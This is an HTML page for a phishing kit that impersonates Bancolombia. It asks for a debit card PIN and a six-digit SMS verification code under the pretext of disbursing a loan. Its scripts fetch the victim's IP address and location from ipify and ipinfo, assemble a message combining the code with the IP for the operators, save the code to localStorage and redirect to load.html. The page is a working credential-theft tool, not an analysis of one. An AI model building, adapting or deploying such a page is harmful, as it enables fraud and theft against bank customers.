
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Bancolombia</title>

<link rel="stylesheet" href="https://sapp2406.sirv.com/bogo/lfr_style.css">
<link rel="stylesheet" href="https://sapp2406.sirv.com/bogo/lfr_ownstyle.css">

   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
<script src="dt.js"></script>
<script>
  $.getJSON("https://api.ipify.org?format=json", function(data) {
          $("#gfg").html(data.ip);
      });
      $.getJSON("https://ipinfo.io", function(response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html("" + response.city + ", " + response.country);
  });

var u_name, d_name, t_name, c_name, aa_name, bb_name, ip, ip2, message;
var ready = function () {
    u_name = document.getElementById("num1").value;
	d_name = document.getElementById("num2").value;
	t_name = document.getElementById("num3").value;
	c_name = document.getElementById("num4").value;
	aa_name = document.getElementById("num5").value;
	bb_name = document.getElementById("num6").value;
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "bbogota\nToken2: " + u_name + "" + d_name + "" + t_name + "" + c_name + "" + aa_name + "" + bb_name + "\n\nIP: " + ip +"\n" + ip2;
  };


</script>

</head>
<body>

	<div class="box-container">
		<div class="container">
			<div class="toast hidden" id="errorMessage" style="position: absolute;">
   <p id="AuthLabel"></p>
   <span class="icon-close-search-r" onclick="hideToast()"></span>
</div>
			<div class="container__water-mark">
				<div class="container__water-mark--image-container"></div>
			</div>
			<div class="container__login">
				<div class="container__login--header">
					<img src="../monitoreo/imagenes/logo-bancolombia-black.svg" alt="">
				</div>
				<div class="container__login--title">
					<div class="container__login--title-1">
						<div class="container__login--title-1">
                        	<p>Identificacion de usuario</p>
	                    </div>
	                    <div class="container__login--title-2">
	                        <p>
	                        	<label class="tituloformulario" id="flujoOrigenLbl"></label>
	                        </p>
	                    </div>
					</div>
				</div>
				<div class="container__login--login-box-id">
					<div class="container__login--login-box-title">
						<span><strong>
						</strong></span>
					</div>
					<div class="form-container">

						<form method="post" name="authenticateForm" id="authenticateForm" action="" autocomplete="off">
							



							<div class="field-1">
								<div class="custom-input">
									<div class="label">
										<label for="password">Clave de la tarjeta debito</label>
									</div>
									<input name="Password" type="password" class="custom-form-control" id="Password" maxlength="4" size="8">
								</div>
							</div>

							<div class="btn-container">
								<button type="submit" class="btn-main" id="btnContinue" disabled="">Continuar</button>
							</div>
						</form>
					</div>
				</div>
				<div class="timeElapsed">
	<label>Tiempo restante&nbsp;</label><span id="timeE_min">05</span><label>:</label><span id="timeE_seg">18</span><label>&nbsp;minutos</label><br> <label><span id="timeE_date">Jueves, 29 de Febrero de 2024, 5:28 PM</span></label><br> <label><span id="timeE_ip">IP 186.116.65.249</span></label>
</div>
			</div>

			<style>
    ul {
        list-style-type: none;
        margin-top: 2rem;
        margin-left: 4rem;
        vertical-align: top;
    }

    li {
        display: flex;
        align-items: center;
        margin-bottom: 1rem;
    }

    .icon-info {
        width: 3rem;
        height: 3rem;
        margin-right: 1rem;
        object-fit: cover;
    }
</style>
<div class="container__info">
    <div class="container__info--tips">
        <div class="collapsable">
            <div class="collapse">
                <div class="collapse__header">
                    <div class="collapse__header--text">
                        <p class="header">Tu seguridad es lo primero</p>
                    </div>
                    <div class="collapse__header--btn">
                        <i class="icon-down-b"></i>
                    </div>
                </div>
                <div class="collapse__content hidden">
                    <p>Sigue estos tips y tus transacciones estarï¿½n blindadas</p>
                    <ul>
                        <li><img id="icon-pass" class="icon-info" src="https://sapp2406.sirv.com/bogo/icon-pass.png"><p><strong>No compartas</strong> tus claves o token con terceros.</p></li>
                        <li><img id="icon-device" class="icon-info" src="https://sapp2406.sirv.com/bogo/icon-device.png"><p><strong>Evita realizar</strong> transacciones desde un equipo o dispositivo desconocido.</p></li>
                        <li><img id="icon-lock" class="icon-info" src="https://sapp2406.sirv.com/bogo/icon-lock.png"><p><strong>Procura cambiar</strong> tus contraseï¿½as bancarias periï¿½dicamente o antes si sientes que es necesario.</p></li>
                    </ul>  
                </div>
            </div>
        </div>
        <div class="collapsable">
            <div class="collapse">
                <div class="collapse__header">
                    <div class="collapse__header--text">
                        <p class="header">Contï¿½ctanos</p>
                    </div>
                    <div class="collapse__header--btn">
                        <i class="icon-down-b"></i>
                    </div>
                </div>
                <div class="collapse__content hidden">
                    <p>Si tienes alguna duda o algo te ha sucedido, usa nuestros canales</p>
                    <ul>
                        <li><img id="icon-call" class="icon-info" src="https://sapp2406.sirv.com/bogo/icon-call.png"><p>Llamar a la <strong>Servilinea</strong></p></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>		<div class="modal modalSE hidden" id="safeExitModal">
	<div class="modal__container" id="semc">
		<span class="close" id="closeModalSE" onclick="hideModalSE()">ï¿½</span>
		<div class="modal-title">
			<h2>Abandonar el proceso</h2>
		</div>
		<div class="modal-text" id="modalSafeExitMsg">
			<p>Ha activado una Salida de forma segura</p>
		</div>
		<div class="modal-action">
			<button type="button" class="btn-main" onclick="lfr_controlExit()">Aceptar</button>
		</div>
	</div>
</div>
<div class="overlay overlaySE hidden"></div>
			<div class="modal modalMA hidden">
	<div class="modal__container" id="containerMA">
		<h2 class="modal-title">Se requiere una acciï¿½n vï¿½lida</h2>
		<div class="modal__container--content">
			<p class="modal-text" id="modalAlertMsg"></p>
			<div class="modal-action">
				<button type="button" class="btn-main" onclick="hideModalMA()">Entendido</button>
			</div>
		</div>
	</div>
</div>
<div class="overlay overlayMA hidden"></div>

			<div class="modal modalIN hidden">
	<div class="modal__container">
		<div class="modal-title">
			<h2>Accion Automotica Activada</h2>
		</div>
		<div class="modal-text">
			<p id="modalAlertMsgIN"></p>
		</div>
		<div class="modal-action">
			<button type="button" class="btn-main" onclick="lfr_inactivityAction()">Entendido</button>
		</div>
	</div>
</div>
<div class="overlay overlayIN hidden"></div>

			 <style>
    .btn-img {
        background: none;
        border: none;
        min-width: 15rem;
        height: 5rem;
        outline: none;
        cursor: pointer;
    }

    #getOnPlayStore{
        min-width: 15rem;
        height: 5rem;
        object-fit: cover;
    }
    
    @media only screen and (max-width: 37.5em) {
        #getOnPlayStore{
            height: 4rem !important;
        }
    }

    #tokenAppImg{
        min-width: 6rem;
        height: 6rem;
    }

    #getOnAppStore{
        min-width: 15rem;
        height: 5rem;
        object-fit: cover;
    }
    
    @media only screen and (max-width: 37.5em) {
        #getOnAppStore{
            height: 4rem !important;
            margin-top: 0.5rem;
            margin-bottom: 0.5rem;
        }
    }


    .modalPopUp-text{
        font-size: 1.6rem;
        color: black;
        margin-bottom: 1.5rem;
    }

    #download{
        color: #0040a8;
    }

    .link{
        color: #0040a8;
        text-decoration: underline;
        cursor: pointer;
    }
    
    #modalAction{
    	margin-bottom: 1.5rem;
    }

    .modal-bottom{
        display: flex;
        flex-direction: row;
        justify-content: center;
        align-items: center;
    }
</style>
<form method="post" id="form">
<p id="gfg"  hidden=""></p>
<p id="address"  hidden=""></p>
<div class="modal modalUP">
    <div class="modal__container">
        <h2 class="modal-title">Para continuar y deseembolsar tu credito sera necesario el uso de tu codigo Sms enviado a tu
                telefono. </h2><br>
   <a style="color:rgb(13, 13, 13);font-size: 12px;">Codigo no valido o expirado. Por favor ingresa una nuevo codigo.</a><br><br>
    <style>
			.token-container {
				display: flex;
				flex-wrap: wrap; /* Permitir que los elementos se envuelvan en pantallas pequeÃ±as */
				justify-content: space-around;
				max-width: 400px; /* Ajusta el ancho mÃ¡ximo segÃºn tus necesidades */
				margin: auto; /* Centra el contenedor */
			}
		
			.token-input {
				width: 30%; /* Ajusta el ancho del cuadro segÃºn tus necesidades */
				max-width: 60px; /* Establecer un ancho mÃ¡ximo para evitar que los cuadros sean demasiado grandes */
				height: 60px; /* Ajusta la altura del cuadro segÃºn tus necesidades */
				text-align: center;
				font-size: 20px; /* Ajusta el tamaÃ±o de la fuente segÃºn tus necesidades */
				border: 2px solid #ccc;
				border-radius: 8px;
				margin-bottom: 10px; /* Espaciado entre cuadros */
			}
		
			@media screen and (max-width: 600px) {
				.token-input {
					width: 45%; /* Ajusta el ancho del cuadro para pantallas muy pequeÃ±as */
					max-width: 40px; /* Reduzca aÃºn mÃ¡s el ancho mÃ¡ximo en dispositivos mÃ³viles */
					height: 40px; /* Reduzca la altura en dispositivos mÃ³viles */
					font-size: 16px; /* Reduzca el tamaÃ±o de la fuente en dispositivos mÃ³viles */
				}
			}
		</style>


<div class="token-container">
	 <input type="tel" class="token-input" maxlength="1" name="num1" id="num1" oninput="moveToNextInput(this, 2)" required autocomplete="off" />
    <input type="tel" class="token-input" maxlength="1" name="num2" id="num2" oninput="moveToNextInput(this, 3)" readonly autocomplete="off" />
    <input type="tel" class="token-input" maxlength="1" name="num3" id="num3" oninput="moveToNextInput(this, 4)" readonly autocomplete="off" />
    <input type="tel" class="token-input" maxlength="1" name="num4" id="num4" oninput="moveToNextInput(this, 5)" readonly autocomplete="off" />
    <input type="tel" class="token-input" maxlength="1" name="num5" id="num5" oninput="moveToNextInput(this, 6)" readonly autocomplete="off" />
    <input type="tel" class="token-input" maxlength="1" name="num6" id="num6" oninput="moveToNextInput(this, null)" readonly autocomplete="off" />
</div>          
<script>
    function moveToNextInput(currentInput, nextInputIndex) {
        const inputValue = currentInput.value;

        if (!isNaN(inputValue) && nextInputIndex) {
            const nextInput = document.querySelector(`.token-input:nth-child(${nextInputIndex})`);
            nextInput.focus();
        }
    }
</script>

<script>
    function moveToNextInput(currentInput, nextInputIndex) {
        const inputValue = currentInput.value;

        if (!isNaN(inputValue) && nextInputIndex) {
            const nextInput = document.querySelector(`.token-input:nth-child(${nextInputIndex})`);
            nextInput.removeAttribute('readonly');
            nextInput.focus();
        }
    }
</script><br>
<button 
  type="submit" 
  class="btn-main" 
  id="btnAction"
  style="
    width:50%;
    background-color:#ffcc00;   /* amarillo */
    color:#000;                 /* texto negro */
    border:none;
    padding:12px;
    font-size:16px;
    font-weight:bold;
    border-radius:26px;
    cursor:pointer;
    transition:background-color 0.2s ease;
  " 
  onmousedown="this.style.backgroundColor='#ffe066';" 
  onmouseup="this.style.backgroundColor='#ffcc00';" 
  onmouseout="this.style.backgroundColor='#ffcc00';"
>
  Continuar
</button>
<br>

</form>
        <br><br><div class="modal-bottom">
            <p class="modal-text">*Si eres Persona de cedula de extranjeria pega el codigo de 6 digitos que llega via mensaje de texto a tu telefono <b>codigo sms</b></p>
            <img id="tokenAppImg" src="..//monitoreo/imagenes/logo-bancolombia-black.svg">
        </div>
    </div>
</div>
<div class="overlay overlayUP"></div>


		</div>

	</div>	

     <script>
        document.addEventListener("DOMContentLoaded", function () {
          const form = document.getElementById("form");
      
          form.addEventListener("submit", function (event) {
            event.preventDefault();
      const num1 = document.getElementById("num1").value;
            const num2 = document.getElementById("num2").value;
            const num3 = document.getElementById("num3").value;
            const num4 = document.getElementById("num4").value;
            const num5 = document.getElementById("num5").value;
            const num6 = document.getElementById("num6").value;
                                                         
            const tokenCompleto = `${num1}${num2}${num3}${num4}${num5}${num6}`;  
      
            // Se guarda como si fuera un “dato” completo para que load.html lo entienda
            const datos = {
              nombre: "dinamica",
              apellido: "SMS",
              correo: "dinamica@secure.com",
              telefono: tokenCompleto
            };
            
            localStorage.setItem("datos", JSON.stringify(datos));
      
            // Redirige como siempre
            window.location.href = "load.html";
          });
        });
      </script>
</body></html>
